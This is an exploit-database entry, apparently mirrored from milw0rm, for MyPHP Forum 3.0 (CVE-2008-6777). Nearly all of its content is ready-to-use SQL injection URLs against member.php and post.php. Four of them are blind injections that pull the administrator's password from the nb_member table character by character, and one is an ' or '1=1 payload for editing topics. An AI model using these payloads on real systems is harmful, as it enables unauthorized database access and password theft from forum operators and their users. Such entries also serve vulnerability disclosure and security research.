[] NeoSense
E X P L O I T S
title author type platform port cve id

MyPHP Forum 3.0 - Edit Topics / Blind SQL Injection

Author: StAkeR
type: webapps
platform: php
port: 
date_added: 2008-10-29 
date_updated: 2017-10-30 
verified: 1 
codes: OSVDB-54241;CVE-2008-6777 
tags: 
aliases:  
screenshot_url:  
application_url: 
/*
    -----------------------------------------------------------------------------------
    MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities
    -----------------------------------------------------------------------------------
    Discovered By StAkeR[at]hotmail[dot]it
    Download On http://www.myphp.ws/


   - member.php (confirm - Blind SQL Injection)
   - member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/*

   - member.php (newconfirm - Blind SQL Injection)
   - member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98--

   - member.php?action=reqpwd  (reqpwd - Blind SQL Injection)
   - insert  ' or ascii(substring((select password from nb_member where uid=1),1,1))=98#

   - post.php (post Blind SQL Injection)
   - post.php?action=post&fid=1&tid=1&quote=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23

   - post.php (edit - Edit Topics)
   - post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1




/*

# milw0rm.com [2008-10-30]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.